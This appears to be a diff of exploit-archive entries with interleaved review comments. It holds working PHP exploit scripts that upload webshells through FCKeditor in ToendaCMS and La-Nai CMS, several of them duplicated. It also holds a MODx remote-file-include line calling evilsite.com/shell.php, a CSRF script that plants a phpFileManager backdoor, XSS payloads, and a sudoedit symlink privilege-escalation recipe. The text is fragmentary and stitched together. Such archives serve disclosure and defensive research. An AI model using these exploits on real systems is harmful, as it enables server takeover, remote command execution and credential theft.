- Vulnerability: Vulnerable File: commands.asp Function: FileUpload() Vulnerable Code: sFileName = RemoveExtension( sOriginalFileName ) & "(" & iCounter & ")." & sExtension
- PoC:http://www.youtube.com/v/1VpxlJ5jLO8?version=3&hl=en_US&rel=0&vq=hd720
"
Note: Quick patch for FCKEditor 2.6.8 File Upload Bypass:

36
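--- /dev/null
+++ b/platforms/linux/local/37710.txt
@@ -0,0 +1,36 @@
+# Exploit Title: sudo -e - a.k.a. sudoedit - unauthorized privilege escalation
+# Date: 07-23-2015
+# Exploit Author: Daniel Svartman
+# Version: Sudo <=1.8.14
+# Tested on: RHEL 5/6/7 and Ubuntu (all versions)
+# CVE: CVE-2015-5602.
+Hello,
+I found a security bug in sudo (checked in the latest versions of sudo
+running on RHEL and ubuntu) when a user is granted with root access to
+modify a particular file that could be located in a subset of directories.
+It seems that sudoedit does not check the full path if a wildcard is used
+twice (e.g. /home/*/*/file.txt), allowing a malicious user to replace the
+file.txt real file with a symbolic link to a different location (e.g.
+/etc/shadow).
+I was able to perform such redirect and retrieve the data from the
+/etc/shadow file.
+In order for you to replicate this, you should configure the following line
+in your /etc/sudoers file:
+<user_to_grant_priv> ALL=(root) NOPASSWD: sudoedit /home/*/*/test.txt
+Then, logged as that user, create a subdirectory within its home folder
+(e.g. /home/<user_to_grant_priv>/newdir) and later create a symbolic link
+inside the new folder named test.txt pointing to /etc/shadow.
+When you run sudoedit /home/<user_to_grant_priv>/newdir/test.txt you will
+be allowed to access the /etc/shadow even if have not been granted with
+such access in the sudoers file.
+I checked this against fixed directories and files (not using a wildcard)
+and it does work with symbolic links created under the /home folder.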
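Review bot: The closing sentence ("I checked this against fixed directories and files (not using a wildcard) and it does work with symbolic links created under the /home folder") is ambiguous about whether "it" is the attack or sudoedit's check, and since the paragraph above says the bypass appears only when a wildcard is used twice (`/home/*/*/file.txt`), a reader cannot tell whether fixed-path sudoedit rules are affected — it should say explicitly, e.g. `With a fixed path (no wildcard) sudoedit refused to follow the symlink; only the wildcard rule was bypassed.` if that is what was observed. The advisory also gives no mitigation, and an operator reading it will want one; I would add `Mitigation: do not grant sudoedit rules whose path contains wildcards beneath directories the invoking user can write to (such as /home/*/*/file), since the pattern is matched against the path supplied by the user and not against the resolved target of a symlink.` The header's "Ubuntu (all versions)" and "Sudo <=1.8.14" read as broader than what the text shows was tested (RHEL 5/6/7 and current Ubuntu); a fixed version is not stated and presumably lands in the following sudo release, so `# Fixed in: see vendor advisory for CVE-2015-5602` would be more honest than an open-ended upper bound.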


@ -1,139 +1,139 @@
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ToendaCMS <= 1.0.0 Shizouka stable 'F(u)CKeditor' remote commands execution\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork: \"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo\n\n";
//works regardless of any php.ini settings,
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to toendacms\n";
echo "cmd: a shell command\n";
echo "Options:\n";
echo " -p[port]: specify a port other than 80\n";
echo " -P[ip:port]: specify a proxy\n";
echo "Example:\n";
echo "php ".$argv[0]." localhost /cms/ ls -la\n";
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
$cmd="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$shell="<?php echo chr(72).\"i Master!\";if(get_magic_quotes_gpc()){\$_COOKIE[\"cmd\"]=stripslashes(\$_COOKIE[\"cmd\"]);}";
$shell.="ini_set(\"max_execution_time\",0);error_reporting(0);";
$shell.="echo \"*delim*\";passthru(\$_COOKIE[\"cmd\"]);?>";
$allowed_extensions = array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla");
for ($i=0; $i<=count($allowed_extensions)-1; $i++){
$filename="suntzu.php.".$allowed_extensions[$i];
$data="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n";
$data.="Content-Type:\r\n\r\n";
$data.="$shell\r\n";
$data.="-----------------------------7d529a1d23092a--\r\n";
$packet="POST ".$p."engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
//echo $html;
$packet="GET ".$p."data/images/File/".$filename." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
if (eregi("Hi Master!",$html)){
$temp=explode("*delim*",$html);
die($temp[1]);}
}
//if you are here...
echo "Exploit failed...";
?>
# milw0rm.com [2006-07-18]
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "ToendaCMS <= 1.0.0 Shizouka stable 'F(u)CKeditor' remote commands execution\n";
echo "by rgod rgod@autistici.org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork: \"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo\n\n";
//works regardless of any php.ini settings,
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\n";
echo "host: target server (ip/hostname)\n";
echo "path: path to toendacms\n";
echo "cmd: a shell command\n";
echo "Options:\n";
echo " -p[port]: specify a port other than 80\n";
echo " -P[ip:port]: specify a proxy\n";
echo "Example:\n";
echo "php ".$argv[0]." localhost /cms/ ls -la\n";
die;
}
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
#echo "\r\n".$html;
}
$host=$argv[1];
$path=$argv[2];
$port=80;
$proxy="";
$cmd="";
for ($i=3; $i<=$argc-1; $i++){
$temp=$argv[$i][0].$argv[$i][1];
if (($temp<>"-p") and ($temp<>"-P"))
{$cmd.=" ".$argv[$i];}
if ($temp=="-p")
{
$port=str_replace("-p","",$argv[$i]);
}
if ($temp=="-P")
{
$proxy=str_replace("-P","",$argv[$i]);
}
}
if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {echo 'Error... check the path!'; die;}
if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
$shell="<?php echo chr(72).\"i Master!\";if(get_magic_quotes_gpc()){\$_COOKIE[\"cmd\"]=stripslashes(\$_COOKIE[\"cmd\"]);}";
$shell.="ini_set(\"max_execution_time\",0);error_reporting(0);";
$shell.="echo \"*delim*\";passthru(\$_COOKIE[\"cmd\"]);?>";
$allowed_extensions = array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla");
for ($i=0; $i<=count($allowed_extensions)-1; $i++){
$filename="suntzu.php.".$allowed_extensions[$i];
$data="-----------------------------7d529a1d23092a\r\n";
$data.="Content-Disposition: form-data; name=\"NewFile\"; filename=\"$filename\"\r\n";
$data.="Content-Type:\r\n\r\n";
$data.="$shell\r\n";
$data.="-----------------------------7d529a1d23092a--\r\n";
$packet="POST ".$p."engine/js/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php?Command=FileUpload&Type=File&CurrentFolder=%2f HTTP/1.0\r\n";
$packet.="Content-Type: multipart/form-data; boundary=---------------------------7d529a1d23092a\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
//echo $html;
$packet="GET ".$p."data/images/File/".$filename." HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: cmd=".$cmd."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
if (eregi("Hi Master!",$html)){
$temp=explode("*delim*",$html);
die($temp[1]);}
}
//if you are here...
echo "Exploit failed...";
?>
# milw0rm.com [2006-07-18]


@ -1,26 +1,26 @@
+-------------------------------------------------------------------------------------------
+ MODx CMS 0.9.2.1 (base_path) Remote File Include Vulnerability
+-------------------------------------------------------------------------------------------
+ Affected Software .: MODx CMS 0.9.2.1
+ Vendor ............: http://modxcms.com/
+ Download ..........: http://modxcms.com/downloads.html
+ Description .......: "MODx is an open source PHP Application Framework that helps you take control of your online content."
+ Dork ..............: "powered by MODx"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ MODx CMS manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php does not initialize
+ the $base_path variable before using it to include files, assuming register_globals = on,
+ we can intialize the variable in a query string and include a remote file of our choice.
+
+ Vulnerable Code:
+ manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php, line(s) 24:
+ -> include $base_path."manager/media/browser/mcpuk/connectors/php/Commands/helpers/iconlookup.php";
+
+ Proof Of Concept:
+ http://[target]/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://evilsite.com/shell.php?
+-------------------------------------------------------------------------------------------
# milw0rm.com [2006-11-03]
+-------------------------------------------------------------------------------------------
+ MODx CMS 0.9.2.1 (base_path) Remote File Include Vulnerability
+-------------------------------------------------------------------------------------------
+ Affected Software .: MODx CMS 0.9.2.1
+ Vendor ............: http://modxcms.com/
+ Download ..........: http://modxcms.com/downloads.html
+ Description .......: "MODx is an open source PHP Application Framework that helps you take control of your online content."
+ Dork ..............: "powered by MODx"
+ Class .............: Remote File Inclusion
+ Risk ..............: High (Remote File Execution)
+ Found By ..........: nuffsaid <nuffsaid[at]newbslove.us>
+-------------------------------------------------------------------------------------------
+ Details:
+ MODx CMS manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php does not initialize
+ the $base_path variable before using it to include files, assuming register_globals = on,
+ we can intialize the variable in a query string and include a remote file of our choice.
+
+ Vulnerable Code:
+ manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php, line(s) 24:
+ -> include $base_path."manager/media/browser/mcpuk/connectors/php/Commands/helpers/iconlookup.php";
+
+ Proof Of Concept:
+ http://[target]/[path]/manager/media/browser/mcpuk/connectors/php/Commands/Thumbnail.php?base_path=http://evilsite.com/shell.php?
+-------------------------------------------------------------------------------------------
# milw0rm.com [2006-11-03]


@ -6,5 +6,5 @@ An attacker may leverage this issue to execute arbitrary script code in the brow
FCKEditor 2.6.7 is vulnerable; prior versions may also be affected.
html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://www.example.com//fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>
<html> <body> <iframe style="width: 1px; height: 1px; visibility: hidden" name="hidden"></iframe> <form method="post" name="sender" action="http://www.example.com/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php"; target="hidden"> <input type="hidden" name="textinputs[]" value='");alert("THIS SITE IS XSS VULNERABLE!");</script><!--' /> </form> </body> <script>document.sender.submit(); </script> </html>

125
platforms/php/webapps/37712.txt Executable file

@ -0,0 +1,125 @@
# Exploit Title: CSRF Remote Backdoor Shell
# Google Dork: intitle: CSRF Remote Backdoor Shell
# Date: 2015-07-29
# Exploit Author: John Page ( hyp3rlinx )
# Website: hyp3rlinx.altervista.org
# Vendor Homepage: phpfm.sourceforge.net
# Software Link: phpfm.sourceforge.net
# Version: 0.9.8
# Tested on: windows 7 SP1
# Category: Webapps
Vendor:
================================
phpfm.sourceforge.net
Product:
============================
phpFileManager version 0.9.8
Vulnerability Type:
==========================
CSRF Remote Backdoor Shell
CVE Reference:
==============
N/A
Advisory Information:
========================================
CSRF Remote Backdoor Shell Vulnerability
Vulnerability Details:
=======================================================================
PHP File Manager is vulnerable to creation of arbitrary files on server
via CSRF which we can use to create remote backdoor shell access if victim
clicks our malicious linx or visits our malicious webpages.
To create backdoor shell we will need to execute two POST requests
1- to create PHP backdoor shell 666.php
2- inject code and save to the backdoor we just created
e.g.
https://localhost/phpFileManager-0.9.8/666.php?cmd=[ OS command ]
Exploit code(s):
===============
<script>
var
scripto="frame=3&action=2&dir_dest=2&chmod_arg=&cmd_arg=666.php&current_dir=&selected_dir_list=&selected_file_list="
blasphemer(scripto)
var
maliciouso="action=7&save_file=1&current_dir=.&filename=666.php&file_data='<?php+echo+'backdoor
shell by hyp3rlinx......';+exec($_GET['cmd']);+?>"
blasphemer(maliciouso)
function blasphemer(payload){
var xhr=new XMLHttpRequest()
xhr.open('POST',"https://localhost/phpFileManager-0.9.8/index.php", true)
xhr.setRequestHeader("content-type", "application/x-www-form-urlencoded")
xhr.send(payload)
}
</script>
Disclosure Timeline:
=========================================================
Vendor Notification: July 28, 2015
July 29, 2015 : Public Disclosure
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST
Vulnerable Product: [+] phpFileManager 0.9.8
Vulnerable Parameter(s): [+] action, cmd_arg, file_data, chmod_arg,
save_file
Affected Area(s): [+] Web Server
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx
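Review bot: The `# Exploit Title:` header at the top of this file names only the vulnerability class, `CSRF Remote Backdoor Shell`, while the `Vendor:`/`Product:` sections and the `# Version:` field identify the software as phpFileManager 0.9.8; since the title line is presumably what the entry is listed and searched under, it should read `# Exploit Title: phpFileManager 0.9.8 - CSRF Remote Backdoor Shell`. The advisory also states no root cause or remediation: the `Vulnerable Parameter(s)` list (`action`, `cmd_arg`, `file_data`, `save_file`) and `Request Method(s): [+] POST` imply that state-changing requests to index.php are accepted without any per-session anti-CSRF token, and one sentence saying so (token checked server-side, `SameSite` on the session cookie as defence in depth) would let defenders triage without running the PoC. `CVE Reference: N/A` together with a one-day `Vendor Notification`/`Public Disclosure` gap is worth flagging in the entry, as readers cannot tell whether a fixed version exists.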

27
platforms/php/webapps/37715.txt Executable file

@ -0,0 +1,27 @@
# Exploit Title: Tendoo CMS Stored And Reflected Xss Vulnerability
# Google Dork: N/A
# Date: 28/7/2015
# Exploit Author: Arash Khazaei
# Vendor Homepage: http://tendoo.org/
# Software Link: http://sourceforge.net/projects/tendoo-cms/
# Version: 1.3
# Tested on: Kali , Windows
# CVE : N/A
# Contact : 0xclay@gmail.com
######################
Introduction :
a Stored And a Reflected XSS Vulnerability In Profile Area In Tendoo CMS
Make CMS Vulnerable And Can Be Used For Stealing Admin Cookies And ....... .
######################
Stored Xss In http://localhost/tendoo/index.php/account/update In First
Name and Last Name Inputs
Excute Java Script Codes And If Admin Or Any Body Come In Attacker Profile
When First Name And Last Name Loads
JavaScripts Code Will Be Excuted
POC :
https://i.leetfil.es/e992ad2d.jpg
Discovered By Arash Khazaei
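Review bot: The `# Exploit Title:` line promises both a stored and a reflected XSS, but the body only describes the stored case (First Name and Last Name inputs on `index.php/account/update`); the reflected vector is never identified, so either `Reflected` should be dropped from the title or the body should say where that case occurs. The only proof of concept is an external screenshot link (`https://i.leetfil.es/e992ad2d.jpg`), which is not reproducible and will likely rot; stating the affected fields and the missing control (output encoding of profile fields on render) inline would make the entry self-contained. Unlike the other advisory added in this commit, this one carries no vendor-notification or disclosure timeline, so readers cannot tell whether version 1.3 was reported upstream before publication.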


@ -1,155 +1,155 @@
<?php
/*
--------------------------------------------------------------
La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://sourceforge.net/projects/la-nai/
[-] vulnerable code in /include/fckeditor/editor/filemanager/upload/php/upload.php
41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55. SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63. SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76. $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80. // Compose the file path.
81. $sFilePath = $sServerDir . $sFileName ;
82.
83. // If a file with that name already exists.
84. if ( is_file( $sFilePath ) )
85. {
86. $iCounter++ ;
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88. $sErrorNumber = '201' ;
89. }
90. else
91. {
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94. if ( is_file( $sFilePath ) )
95. {
96. $oldumask = umask(0) ;
97. chmod( $sFilePath, 0777 ) ;
98. umask( $oldumask ) ;
99. }
100.
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103. break ;
104. }
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n| La-Nai CMS <= 1.2.16 Arbitrary File Upload Exploit by EgiX |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /lanai-cms/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}include/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nlanai-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-05-14]
<?php
/*
--------------------------------------------------------------
La-Nai CMS <= 1.2.16 (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://sourceforge.net/projects/la-nai/
[-] vulnerable code in /include/fckeditor/editor/filemanager/upload/php/upload.php
41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55. SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63. SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76. $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80. // Compose the file path.
81. $sFilePath = $sServerDir . $sFileName ;
82.
83. // If a file with that name already exists.
84. if ( is_file( $sFilePath ) )
85. {
86. $iCounter++ ;
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88. $sErrorNumber = '201' ;
89. }
90. else
91. {
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94. if ( is_file( $sFilePath ) )
95. {
96. $oldumask = umask(0) ;
97. chmod( $sFilePath, 0777 ) ;
98. umask( $oldumask ) ;
99. }
100.
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103. break ;
104. }
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n| La-Nai CMS <= 1.2.16 Arbitrary File Upload Exploit by EgiX |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /lanai-cms/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}include/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nlanai-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-05-14]


@ -1,144 +1,144 @@
<?php
/*
--------------------------------------------------------------
Syntax CMS <= 1.3 (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------
Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For the Exploit Code
author...: Stack
mail.....: Ev!L
descr:
if the web site change the name of path or path is /public/ you can delet /public/ in the exploit
in the line :
"POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php
[-] vulnerable code in /public/fckeditor/editor/filemanager/upload/php/upload.php
41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
